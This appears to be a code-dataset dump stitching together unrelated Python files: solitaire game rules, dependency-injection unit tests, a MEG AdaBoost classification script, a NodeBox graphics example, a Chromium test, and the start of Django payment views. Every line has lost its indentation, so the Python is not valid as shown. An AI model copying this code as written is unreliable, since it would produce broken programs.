th = l.YS + (12//rows-1) * TABLEAU_YOFFSET
# (set piles so that at least 2/3 of a card is visible with 10 cards)
h = (10-1)*l.YOFFSET + l.CH*2//3
self.setSize(10*l.XS+l.XM, l.YM + 3*th + l.YM + h)
# create stacks
s.addattr(tableaux=[]) # register extra stack variable
x = l.XM + 8 * l.XS + l.XS // 2
y = l.YM + l.CH // 2
s.foundations.append(self.Foundation_Class(x, y, self))
y = l.YM
for cl in self.TableauStack_Classes:
x = l.XM
for j in range(8):
s.tableaux.append(cl(x, y, self, yoffset=TABLEAU_YOFFSET))
x = x + l.XS
y = y + th
x, y = l.XM, y + l.YM
for i in range(8):
s.rows.append(self.RowStack_Class(x, y, self))
x = x + l.XS
# self.setRegion(s.rows, (-999, -999, x - l.CW // 2, 999999))
x = l.XM + 8 * l.XS + l.XS // 2
y = self.height - l.YS
s.talon = self.Talon_Class(x, y, self)
l.createText(s.talon, "se")
if waste:
y -= l.YS
s.waste = WasteStack(x, y, self)
l.createText(s.waste, "se")
self.setRegion(s.foundations, (x - l.CW // 2, -999, 999999, y - l.CH))
# define stack-groups
if waste:
ws = [s.waste]
else:
ws = []
self.sg.openstacks = s.foundations + s.tableaux + s.rows + ws
self.sg.talonstacks = [s.talon] + ws
self.sg.dropstacks = s.tableaux + s.rows + ws
#
# game overrides
#
def startGame(self):
self.s.talon.dealRow(rows=self.s.tableaux, frames=0)
self._startAndDealRow()
def isGameWon(self):
if len(self.s.foundations[0].cards) != 8:
return False
for stack in self.s.tableaux:
if len(stack.cards) != 4:
return False
return True
def fillStack(self, stack):
if self.s.talon.cards:
if stack in self.s.rows and len(stack.cards) == 0:
self.s.talon.dealRow(rows=[stack])
def shallHighlightMatch(self, stack1, card1, stack2, card2):
if card1.rank == ACE or card2.rank == ACE:
return False
return (card1.suit == card2.suit and
(card1.rank + 3 == card2.rank or card2.rank + 3 == card1.rank))
def getHighlightPilesStacks(self):
return ()
# ************************************************************************
# * Great Wheel
# ************************************************************************
class GreatWheel_Hint(PictureGallery_Hint):
shallMovePile = PictureGallery_Hint._cautiousShallMovePile
class GreatWheel_Foundation(PictureGallery_Foundation):
def acceptsCards(self, from_stack, cards):
if not PictureGallery_Foundation.acceptsCards(self, from_stack, cards):
return False
if self.cards and self.cards[-1].color == cards[0].color:
return False
return True
class GreatWheel_RowStack(BasicRowStack):
def acceptsCards(self, from_stack, cards):
if not BasicRowStack.acceptsCards(self, from_stack, cards):
return False
if self.game.s.talon.cards:
return False
if not self.cards:
return True
c1, c2 = self.cards[-1], cards[0]
return c1.suit == c2.suit and c1.rank == c2.rank+1
getBottomImage = Stack._getTalonBottomImage
class GreatWheel(PictureGallery):
Hint_Class = GreatWheel_Hint
Foundation_Class = GreatWheel_Foundation
TableauStack_Classes = [
StackWrapper(
PictureGallery_TableauStack, base_rank=2, max_cards=5, dir=2),
StackWrapper(
PictureGallery_TableauStack, base_rank=1, max_cards=6, dir=2),
]
RowStack_Class = StackWrapper(GreatWheel_RowStack, max_accept=1)
Talon_Class = StackWrapper(WasteTalonStack, max_rounds=1)
def createGame(self):
PictureGallery.createGame(self, waste=True)
def fillStack(self, stack):
if stack is self.s.waste and not stack.cards:
self.s.talon.dealCards()
if self.s.talon.cards or self.s.waste.cards:
if stack in self.s.rows and len(stack.cards) == 0:
old_state = self.enterState(self.S_FILL)
for i in range(4):
if not self.s.waste.cards:
self.s.talon.dealCards()
if self.s.waste.cards:
self.s.waste.moveMove(1, stack)
self.leaveState(old_state)
def startGame(self):
self.startDealSample()
for i in range(4):
self.s.talon.dealRow()
self.s.talon.dealCards()
def isGameWon(self):
if len(self.s.foundations[0].cards) != 8:
return False
if self.s.talon.cards or self.s.waste.cards:
return False
for stack in self.s.rows:
if stack.cards:
return False
return True
def shallHighlightMatch(self, stack1, card1, stack2, card2):
if card1.rank == ACE or card2.rank == ACE:
return False
return (card1.suit == card2.suit and
(card1.rank + 2 == card2.rank or card2.rank + 2 == card1.rank))
# ************************************************************************
# * Mount Olympus
# * Zeus
# ************************************************************************
class MountOlympus_Foundation(SS_FoundationStack):
def getHelp(self):
return 'Build up in suit by twos.'
class MountOlympus_RowStack(SS_RowStack):
def getHelp(self):
return 'Build down in suit by twos.'
class MountOlympus(Game):
RowStack_Class = MountOlympus_RowStack
def createGame(self):
# create layout
l, s = Layout(self), self.s
# set window
self.setSize(l.XM+9*l.XS, l.YM+3*l.YS+12*l.YOFFSET)
# create stacks
x, y = l.XM+l.XS, l.YM
for i in range(8):
s.foundations.append(
MountOlympus_Foundation(
x, y, self,
suit=i//2, base_rank=ACE, dir=2, max_move=0, max_cards=7))
x += l.XS
x, y = l.XM+l.XS, l.YM+l.YS
for i in range(8):
s.foundations.append(
MountOlympus_Foundation(
x, y, self,
suit=i//2, base_rank=1, dir=2, max_move=0, max_cards=6))
x += l.XS
x, y = l.XM, l.YM+2*l.YS
for i in range(9):
s.rows.append(self.RowStack_Class(x, y, self, dir=-2))
x += l.XS
s.talon = DealRowTalonStack(l.XM, l.YM, self)
l.createText(s.talon, 's')
# define stack-groups
l.defaultStackGroups()
def _shuffleHook(self, cards):
return self._shuffleHookMoveToTop(
cards,
lambda c: (c.rank in (ACE, 1), (c.rank, c.suit)))
def startGame(self):
self.startDealSample()
self.s.talon.dealRow(rows=self.s.foundations)
self.s.talon.dealRow()
def fillStack(self, stack):
if self.s.talon.cards:
if stack in self.s.rows and len(stack.cards) == 0:
self.s.talon.dealRow(rows=[stack])
def shallHighlightMatch(self, stack1, card1, stack2, card2):
return (card1.suit == card2.suit and
(card1.rank + 2 == card2.rank or card2.rank + 2 == card1.rank))
class Zeus_RowStack(MountOlympus_RowStack):
def acceptsCards(self, from_stack, cards):
if not MountOlympus_RowStack.acceptsCards(self, from_stack, cards):
return False
if not self.cards:
return cards[0].rank in (QUEEN, KING)
return True
class Zeus(MountOlympus):
RowStack_Class = Zeus_RowStack
def startGame(self):
self.s.talon.dealRow(rows=self.s.foundations, frames=0)
self.startDealSample()
for i in range(4):
self.s.talon.dealRow()
# ************************************************************************
# * Royal Parade
# ************************************************************************
class RoyalParade_TableauStack(PictureGallery_TableauStack):
def _canSwapPair(self, from_stack):
if from_stack not in self.game.s.tableaux:
return False
if len(self.cards) != 1 or len(from_stack.cards) != 1:
return False
c0, c1 = from_stack.cards[0], self.cards[0]
return (c0.rank == self.cap.base_rank and
c1.rank == from_stack.cap.base_rank)
def acceptsCards(self, from_stack, cards):
if self._canSwapPair(from_stack):
return True
return PictureGallery_TableauStack.acceptsCards(
self, from_stack, cards)
def moveMove(self, ncards, to_stack, frames=-1, shadow=-1):
if self._canSwapPair(to_stack):
self._swapPairMove(ncards, to_stack, frames=-1, shadow=0)
else:
PictureGallery_TableauStack.moveMove(self, ncards, to_stack,
frames=frames, shadow=shadow)
def _swapPairMove(self, n, other_stack, frames=-1, shadow=-1):
game = self.game
old_state = game.enterState(game.S_FILL)
swap = game.s.internals[0]
game.moveMove(n, self, swap, frames=0)
game.moveMove(n, other_stack, self, frames=frames, shadow=shadow)
game.moveMove(n, swap, other_stack, frames=0)
game.leaveState(old_state)
class RoyalParade(PictureGallery):
Talon_Class = DealRowTalonStack
TableauStack_Classes = [
StackWrapper(RoyalParade_TableauStack,
base_rank=1, max_cards=4, dir=3),
StackWrapper(RoyalParade_TableauStack,
base_rank=2, max_cards=4, dir=3),
StackWrapper(RoyalParade_TableauStack,
base_rank=3, max_cards=4, dir=3),
]
RowStack_Class = StackWrapper(BasicRowStack, max_accept=0)
def createGame(self):
PictureGallery.createGame(self)
self.s.internals.append(InvisibleStack(self))
def startGame(self):
self.startDealSample()
self.s.talon.dealRow(rows=self.s.tableaux)
self.s.talon.dealRow()
# ************************************************************************
# * Virginia Reel
# ************************************************************************
class VirginiaReel_Talon(DealRowTalonStack):
def canDealCards(self):
if not DealRowTalonStack.canDealCards(self):
return False
for s in self.game.s.tableaux:
if not s.cards:
return False
return True
class VirginiaReel(RoyalParade):
Talon_Class = VirginiaReel_Talon
def _shuffleHook(self, cards):
bottom_cards = []
ranks = []
for c in cards[:]:
if c.rank in (1, 2, 3) and c.rank not in ranks:
ranks.append(c.rank)
cards.remove(c)
bottom_cards.append(c)
if len(ranks) == 3:
break
bottom_cards.sort(key=lambda x: -x.rank)
return cards+bottom_cards
def startGame(self):
self.s.talon.dealRow(rows=self.s.tableaux[0::8], frames=0)
self.startDealSample()
for i in range(3):
rows = self.s.tableaux[i*8+1:i*8+8]
self.s.talon.dealRow(rows=rows)
self.s.talon.dealRow()
def fillStack(self, stack):
pass
# register the game
registerGame(GameInfo(7, PictureGallery, "Picture Gallery",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_BALANCED,
altnames=("Die Bildgallerie", "Mod-3")))
registerGame(GameInfo(397, GreatWheel, "Great Wheel",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_BALANCED,
ranks=list(range(12)) # without Kings
))
registerGame(GameInfo(398, MountOlympus, "Mount Olympus",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_BALANCED))
registerGame(GameInfo(399, Zeus, "Zeus",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_BALANCED))
registerGame(GameInfo(546, RoyalParade, "Royal Parade",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_MOSTLY_SKILL,
rules_filename='virginiareel.html'))
registerGame(GameInfo(547, VirginiaReel, "Virginia Reel",
GI.GT_2DECK_TYPE, 2, 0, GI.SL_MOSTLY_SKILL))
| gpl-3.0 | 1,956,107,269,263,925,200 | 33.953767 | 79 | 0.529662 | false |
shadowmint/python-nark | tests/nark/resolve_tests.py | 1 | 10766 | # Copyright 2013 Douglas Linder
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import unittest
import bootstrap
from nark import *
class ResolverTests(unittest.TestCase):
def test_can_resolve_decroated_class(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Printer)
c.register(Valuer)
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
instance = HasDeps()
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "prints-hello", "Failed to resolve printer")
a.equals(output2, 20, "Failed to resolve valuer")
def test_can_resolve_decroated_class_from_array(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = [ Printer, Valuer ]
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
instance = HasDeps()
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "prints-hello", "Failed to resolve printer")
a.equals(output2, 20, "Failed to resolve valuer")
def test_can_resolve_decroated_compound_class(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IValuer, IPrinter)
class Crazy(object):
def value(self, a, b):
return a - b
def prints(self, msg):
return "hello-" + str(msg)
c = [ Crazy ]
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
instance = HasDeps()
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "hello-hello", "Failed to resolve printer")
a.equals(output2, 0, "Failed to resolve valuer")
def test_can_resolve_instance(self):
class IDb(object):
def data(self):
pass
@implements(IDb)
class Db(object):
def __init__(self):
self._data = {}
def data(self):
return self._data
scope = Scope()
scope.register(Db, per_call=True)
@resolve(scope)
class UsesDb(object):
def __init__(self, db=IDb):
self.db = db
a = Assert()
i1 = UsesDb()
i2 = UsesDb()
i1.db.data()["key"] = "value1"
i2.db.data()["key"] = "value2"
a.equals(i1.db.data()["key"], "value1", "Object was unexpectedly singleton")
a.equals(i2.db.data()["key"], "value2", "Object was unexpectedly singleton")
def test_cant_accidentally_resolve_instance(self):
class IDb(object):
def data(self):
pass
@implements(IDb)
class Db(object):
def __init__(self):
self._data = {}
def data(self):
return self._data
scope = [Db]
@resolve(scope)
class UsesDb(object):
def __init__(self, db=IDb):
self.db = db
a = Assert()
i1 = UsesDb()
i2 = UsesDb()
i1.db.data()["key"] = "value"
a.equals(i2.db.data()["key"], "value", "Object was not a singleton")
i2.db.data()["key"] = "value2"
a.equals(i1.db.data()["key"], "value2", "Object was not a singleton")
def test_can_resolve_deep_query(self):
class IDb(object):
def data(self):
pass
@implements(IDb)
class Db(object):
def data(self):
return 10
scope = [Db]
@resolve(scope)
class UsesDb(object):
def __init__(self, db=IDb):
self.db = db
class HasDep(object):
def __init__(self):
self.service = UsesDb()
a = Assert()
i = HasDep()
value = i.service.db.data()
a.equals(value, 10, "Failed to resolve something with a resolvable child")
def text_complex_init_flags_dont_screw_things_up(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Printer)
c.register(Valuer)
@resolve(c)
class HasDeps(object):
def __init__(self, x, y, valuer=IValuer, printer=IPrinter, *kargs, **kwargs):
self.valuer = valuer
self.printer = printer
self.x = x
self.y = y
self.other = kargs[0]
self.left = kwargs["left"]
a = Assert()
instance = HasDeps(5, 10, 15, left="right")
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "prints-hello", "Failed to resolve printer")
a.equals(output2, 20, "Failed to resolve valuer")
a.equals(instance.x, 5, "Invalid x value")
a.equals(instance.y, 10, "Invalid y value")
a.equals(instance.other, 15, "Invalid kargs value")
a.equals(instance.left, "right", "Invalid kwargs value")
def test_passing_mock_as_argument_works(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Printer)
c.register(Valuer)
class MockPrinter(object):
def prints(self, msg):
return "blah"
@resolve(c)
class HasDeps(object):
def __init__(self, x, y, valuer=IValuer, printer=IPrinter, **kwargs):
self.valuer = valuer
self.printer = printer
self.x = x
self.y = y
self.other = kwargs["other"]
a = Assert()
instance = HasDeps(5, 10, other=15, printer=MockPrinter())
output1 = instance.printer.prints("hello")
output2 = instance.valuer.value(10, 10)
a.equals(output1, "blah", "Failed to use mock printer")
a.equals(output2, 20, "Failed to resolve valuer")
a.equals(instance.x, 5, "Invalid x value")
a.equals(instance.y, 10, "Invalid y value")
a.equals(instance.other, 15, "Invalid kargs value")
def test_inject_with_no_binding_fails(self):
class IPrinter(object):
def prints(self, msg):
pass
@implements(IPrinter)
class Printer(object):
def prints(self, msg):
return "prints-" + str(msg)
c = Scope()
@resolve(c)
class HasDeps(object):
def __init__(self, printer=IPrinter):
self.printer = printer
a = Assert()
failed = False
try:
instance = HasDeps(5, 10, other=15)
except ResolveFailedException:
failed = True
a.true(failed, "Resolved a missing type")
def test_inject_with_stupid_type_fails(self):
class IPrinter(object):
def prints(self, msg):
pass
@implements(IPrinter)
class Printer(object):
def __init__(self, stupid):
pass
def prints(self, msg):
return "prints-" + str(msg)
c = Scope()
c.register(Printer)
@resolve(c)
class HasDeps(object):
def __init__(self, printer=IPrinter):
self.printer = printer
a = Assert()
failed = False
try:
instance = HasDeps(5, 10, other=15)
except ResolveFailedException:
e = exception()
failed = True
a.true(failed, "Resolved a bad type")
def test_passing_stupid_class_fails(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IPrinter)
class Printer(object):
def __init__(self, value): # <-- Stupid, needs zero value constructor
pass
def prints(self, msg):
return "prints-" + str(msg)
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Printer)
c.register(Valuer)
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
failed = False
try:
instance = HasDeps()
except ResolveFailedException:
e = exception()
failed = True
a.trace(e)
a.equals(e.type, Printer, "Didnt set correct exception value")
a.true(failed, "Didn't fail")
def test_when_failing_to_resolve_type_exception_has_type_set(self):
class IPrinter(object):
def prints(self, msg):
pass
class IValuer(object):
def value(self, a, b):
pass
@implements(IValuer)
class Valuer(object):
def value(self, a, b):
return a + b
c = Scope()
c.register(Valuer)
@resolve(c)
class HasDeps(object):
def __init__(self, valuer=IValuer, printer=IPrinter):
self.valuer = valuer
self.printer = printer
a = Assert()
failed = False
try:
instance = HasDeps()
except ResolveFailedException:
e = exception()
failed = True
a.trace(e)
a.equals(e.type, IPrinter, "Didnt set correct exception value")
a.true(failed, "Didn't fail")
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 7,929,102,423,830,692,000 | 22.053533 | 83 | 0.597343 | false |
MadsJensen/malthe_alpha_project | adaboost_src_label.py | 1 | 5002 | """Doc string Here."""
import mne
from mne.minimum_norm import (apply_inverse_epochs, read_inverse_operator)
import socket
import numpy as np
# import matplotlib.pyplot as plt
from sklearn.ensemble import AdaBoostClassifier
# from sklearn.tree import DecisionTreeClassifier
# from sklearn.metrics import confusion_matrix
from sklearn.cross_validation import StratifiedKFold
from sklearn.preprocessing import scale
# import seaborn as sns
# Setup paths and prepare raw data
hostname = socket.gethostname()
if hostname == "Wintermute":
# data_path = "/home/mje/mnt/caa/scratch/"
data_path = "/home/mje/Projects/malthe_alpha_project/data/"
n_jobs = 1
else:
data_path = "/projects/MINDLAB2015_MEG-CorticalAlphaAttention/scratch/"
n_jobs = 1
subjects_dir = data_path + "fs_subjects_dir/"
fname_inv = data_path + '0001-meg-oct-6-inv.fif'
fname_epochs = data_path + '0001_p_03_filter_ds_ica-mc_tsss-epo.fif'
fname_evoked = data_path + "0001_p_03_filter_ds_ica-mc_raw_tsss-ave.fif"
snr = 1.0 # Standard assumption for average data but using it for single trial
lambda2 = 1.0 / snr ** 2
method = "dSPM" # use dSPM method (could also be MNE or sLORETA)
# load labels
labels = mne.read_labels_from_annot('0001', parc='PALS_B12_Lobes',
# regexp="Bro",
subjects_dir=subjects_dir)
labels_occ = [labels[9], labels[10]]
# Load data
inverse_operator = read_inverse_operator(fname_inv)
epochs = mne.read_epochs(fname_epochs)
epochs.crop(0, 1.1)
epochs.resample(200)
stcs_ent_left = apply_inverse_epochs(epochs["ent_left"], inverse_operator,
lambda2, method, pick_ori="normal")
stcs_ent_right = apply_inverse_epochs(epochs["ent_right"], inverse_operator,
lambda2, method, pick_ori="normal")
stcs_ctl_left = apply_inverse_epochs(epochs["ctl_left"], inverse_operator,
lambda2, method, pick_ori="normal")
#src_ctl_l = np.asarray([stc.data.reshape(-1) for stc in stcs_ctl_left])
#src_ent_l = np.asarray([stc.data.reshape(-1) for stc in stcs_ent_left])
#data_ctl_l = np.squeeze(np.asarray(
# mne.extract_label_time_course(stcs_ctl_left,
# labels_occ[1],
# inverse_operator["src"],
# mode="pca_flip")))
#
#data_ent_l = np.squeeze(np.asarray(
# mne.extract_label_time_course(stcs_ent_left,
# labels_occ[1],
# inverse_operator["src"],
# mode="pca_flip")))
data_ent_l = np.asarray([stc.in_label(labels_occ[1]).data.reshape(-1)
for stc in stcs_ent_left])
data_ent_r = np.asarray([stc.in_label(labels_occ[1]).data.reshape(-1)
for stc in stcs_ent_right])
# data_ctl_l = [stc.in_label(labels_occ[1]).data.reshape(-1)
# for stc in stcs_ctl_left]
X = np.vstack([data_ent_l, data_ent_r]) # data for classiication
# Classes for X
y = np.concatenate([np.zeros(len(data_ent_l)), np.ones(len(data_ent_r))])
# Setup classificer
bdt = AdaBoostClassifier(algorithm="SAMME.R",
n_estimators=1000)
n_folds = 10 # number of folds used in cv
cv = StratifiedKFold(y, n_folds=n_folds)
scores = np.zeros(n_folds) # aaray to save scores
feature_importance = np.zeros(X.shape[1]) # array to save features
for ii, (train, test) in enumerate(cv):
bdt.fit(X[train], y[train])
y_pred = bdt.predict(X[test])
y_test = y[test]
scores[ii] = np.sum(y_pred == y_test) / float(len(y_test))
feature_importance += bdt.feature_importances_
feature_importance_std = scale(feature_importance)
feature_importance /= (ii + 1) # create average importance
# # create mask to avoid division error
# feature_importance = np.ma.masked_array(feature_importance,
# feature_importance == 0)
# # normalize scores for visualization purposes
# feature_importance /= feature_importance.std(axis=1)[:, None]
# feature_importance -= feature_importance.mean(axis=1)[:, None]
vertices = [np.array([], int), stc.in_label(labels_occ[1]).rh_vertno]
shape = stcs_ent_left[0].in_label(labels_occ[1]).shape
stc_feat = mne.SourceEstimate(feature_importance.reshape(shape), vertices=vertices,
tmin=0, tstep=stc.tstep,
subject='0001')
stc_feat.save(data_path + "stc_adaboost_feature_label_LvR")
stc_feat_std = mne.SourceEstimate(feature_importance_std.reshape(shape),
vertices=vertices,
tmin=0, tstep=stc.tstep,
subject='0001')
stc_feat_std.save(data_path + "stc_adaboost_feature_label_std_LvR")
np.savetxt(data_path + "adaboost_label_scores_LvR.csv", scores, delimiter=",")
# scores_10 = cross_val_score(bdt, X, y, cv=10, n_jobs=1, verbose=False)
| mit | -3,565,453,520,309,966,000 | 36.609023 | 83 | 0.621351 | false |
pepsipepsi/nodebox_opengl_python3 | examples/09-layer/01-drag.py | 1 | 3947 | import os, sys
sys.path.insert(0, os.path.join("..",".."))
from nodebox.graphics.context import *
from nodebox.graphics import *
# In the previous examples, drawing occurs directly to the canvas.
# It is also possible to draw into different layers,
# and then transform / animate the layers individually.
# The Layer class introduces a lot of useful functionality:
# - layers can receive events from the mouse,
# - layers have an origin point (e.g. "center") from which transformations originate,
# - layers have methods such as Layer.rotate() and Layer.scale(),
# - layers can enable motion tweening (i.e. smooth, automatic transititions).
# A Layer has its personal Layer.draw() method that contains drawing commands.
# In this example, we create a subclass of Layer to display a colored, draggable rectangle:
class DraggableRect(Layer):
def __init__(self, *args, **kwargs):
# A Layer with an extra "clr" property.
Layer.__init__(self, *args, **kwargs)
self.clr = Color(0, 0.75)
def draw(self):
rect(0, 0, self.width, self.height, fill=self.clr, stroke=self.clr)
def on_mouse_enter(self, mouse):
# When the mouse hovers over the rectangle, highlight it.
mouse.cursor = HAND
self.clr.a = 0.75
def on_mouse_leave(self, mouse):
# Reset the mouse cursor when the mouse exits the rectangle.
mouse.cursor = DEFAULT
self.clr.a = 0.5
def on_mouse_drag(self, mouse):
# When the rectangle is dragged, transform it.
# Its scale increases as the mouse is moved up.
# Its angle increases as the mouse is moved left or right.
self.scale(1 + 0.005 * mouse.dy)
self.rotate(mouse.dx)
# The layer's origin defines the origin point for the layer's placement,
# its rotation and scale. If it is (0.5, 0.5), this means the layer will transform
# from its center (i.e. 50% width and 50% height). If you supply integers,
# the values will be interpreted as an absolute offset from the layer's bottom-left corner.
r1 = DraggableRect(x=200, y=200, width=200, height=200, origin=(0.5,0.5), name="blue1")
r1.clr = color(0.0, 0.5, 0.75, 0.5)
r2 = DraggableRect(x=250, y=250, width=200, height=200, origin=(0.5,0.5), name="blue2")
r2.clr = color(0.0, 0.5, 0.75, 0.5)
r3 = DraggableRect(x=300, y=300, width=200, height=200, origin=(0.5,0.5), name="purple1")
r3.clr = color(0.25, 0.15, 0.75, 0.5)
# We'll attach a layer as a child to layer r3.
# Child layers are very handy because they transform together with their parent.
# For example, if the parent layer rotates, all of its children rotate as well.
# However, all of the layers can still receive separate mouse and keyboard events.
# You can use this to (for example) create a flying creature that responds differently
# when the mouse touches its wings or its head - but where all the body parts stick together.
# Position the child's center at (100,100) relative from the parent's layer origin:
r4 = DraggableRect(x=100, y=100, width=100, height=100, origin=(0.5,0.5), name="purple2")
r4.clr = color(0.25, 0.15, 0.75, 0.5)
r3.append(r4)
# Even more nested child layers:
#r5 = DraggableRect(x=50, y=50, width=50, height=50, origin=(0.5,0.5), name="pink1")
#r5.clr = color(1.00, 0.15, 0.75, 0.5)
#r4.append(r5)
# The canvas is essentially a list of layers, just as an image in Photoshop is a list of layers.
# Appending a layer to the canvas ensures that it gets drawn each frame,
# that it receives mouse and keyboard events, and that its motion tweening is updated.
canvas.append(r1)
canvas.append(r2)
canvas.append(r3)
def draw(canvas):
# There is nothing to draw here;
# all the drawing occurs in the separate layers.
canvas.clear()
canvas.size = 500, 500
canvas.run(draw)
# Note: if you have layers that do not need to receive events,
# set Layer.enabled = False; this saves some time doing expensive matrix operations. | bsd-3-clause | 297,551,862,422,727,740 | 41.913043 | 96 | 0.695212 | false |
was4444/chromium.src | tools/android/loading/loading_graph_view_unittest.py | 1 | 3534 | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import loading_graph_view
import request_dependencies_lens
from request_dependencies_lens_unittest import TestRequests
class MockContentClassificationLens(object):
def __init__(self, ad_request_ids, tracking_request_ids):
self._ad_requests_ids = ad_request_ids
self._tracking_request_ids = tracking_request_ids
def IsAdRequest(self, request):
return request.request_id in self._ad_requests_ids
def IsTrackingRequest(self, request):
return request.request_id in self._tracking_request_ids
class LoadingGraphViewTestCase(unittest.TestCase):
def setUp(self):
super(LoadingGraphViewTestCase, self).setUp()
self.trace = TestRequests.CreateLoadingTrace()
self.deps_lens = request_dependencies_lens.RequestDependencyLens(self.trace)
def testAnnotateNodesNoLenses(self):
graph_view = loading_graph_view.LoadingGraphView(self.trace, self.deps_lens)
for node in graph_view.deps_graph.graph.Nodes():
self.assertFalse(node.is_ad)
self.assertFalse(node.is_tracking)
for edge in graph_view.deps_graph.graph.Edges():
self.assertFalse(edge.is_timing)
def testAnnotateNodesContentLens(self):
ad_request_ids = set([TestRequests.JS_REQUEST_UNRELATED_FRAME.request_id])
tracking_request_ids = set([TestRequests.JS_REQUEST.request_id])
content_lens = MockContentClassificationLens(
ad_request_ids, tracking_request_ids)
graph_view = loading_graph_view.LoadingGraphView(self.trace, self.deps_lens,
content_lens)
for node in graph_view.deps_graph.graph.Nodes():
request_id = node.request.request_id
self.assertEqual(request_id in ad_request_ids, node.is_ad)
self.assertEqual(request_id in tracking_request_ids, node.is_tracking)
def testRemoveAds(self):
ad_request_ids = set([TestRequests.JS_REQUEST_UNRELATED_FRAME.request_id])
tracking_request_ids = set([TestRequests.JS_REQUEST.request_id])
content_lens = MockContentClassificationLens(
ad_request_ids, tracking_request_ids)
graph_view = loading_graph_view.LoadingGraphView(self.trace, self.deps_lens,
content_lens)
graph_view.RemoveAds()
request_ids = set([n.request.request_id
for n in graph_view.deps_graph.graph.Nodes()])
expected_request_ids = set([r.request_id for r in [
TestRequests.FIRST_REDIRECT_REQUEST,
TestRequests.SECOND_REDIRECT_REQUEST,
TestRequests.REDIRECTED_REQUEST,
TestRequests.REQUEST,
TestRequests.JS_REQUEST_OTHER_FRAME]])
self.assertSetEqual(expected_request_ids, request_ids)
def testRemoveAdsPruneGraph(self):
ad_request_ids = set([TestRequests.SECOND_REDIRECT_REQUEST.request_id])
tracking_request_ids = set([])
content_lens = MockContentClassificationLens(
ad_request_ids, tracking_request_ids)
graph_view = loading_graph_view.LoadingGraphView(
self.trace, self.deps_lens, content_lens)
graph_view.RemoveAds()
request_ids = set([n.request.request_id
for n in graph_view.deps_graph.graph.Nodes()])
expected_request_ids = set(
[TestRequests.FIRST_REDIRECT_REQUEST.request_id])
self.assertSetEqual(expected_request_ids, request_ids)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 5,233,397,548,926,028,000 | 41.071429 | 80 | 0.703169 | false |
sumihai-tekindo/account_sicepat | l10n_id_sicepat/__init__.py | 1 | 1032 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2016 Sicepat Ekspres (<http://www.sicepat.com>).
# @author Pambudi Satria <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account | gpl-3.0 | 1,969,656,615,452,393,200 | 45 | 78 | 0.593023 | false |
uranusjr/django-buysafe | buysafe/views.py | 1 | 4538 | # -*- coding: utf8
from django.http import HttpResponseBadRequest, HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from django.shortcuts import render
from buysafe.models import PaymentMethod
from buysafe.forms import SunTechReceiveForm, BuySafeSendForm, WebATMSendForm
from buysafe.utils import (
call_handler, call_handler_and_render, get_payment_form,
default_order_info_handler, make_response_handler
)
PAYMENT_SEND_FORMS = {
PaymentMethod.TYPE_BUYSAFE: BuySafeSendForm,
PaymentMethod.TYPE_WEBATM: WebATMSendForm
}
def entry(request, order_id, template='buysafe/entry.html'):
return render(request, template, {'order_id': order_id})
@require_POST
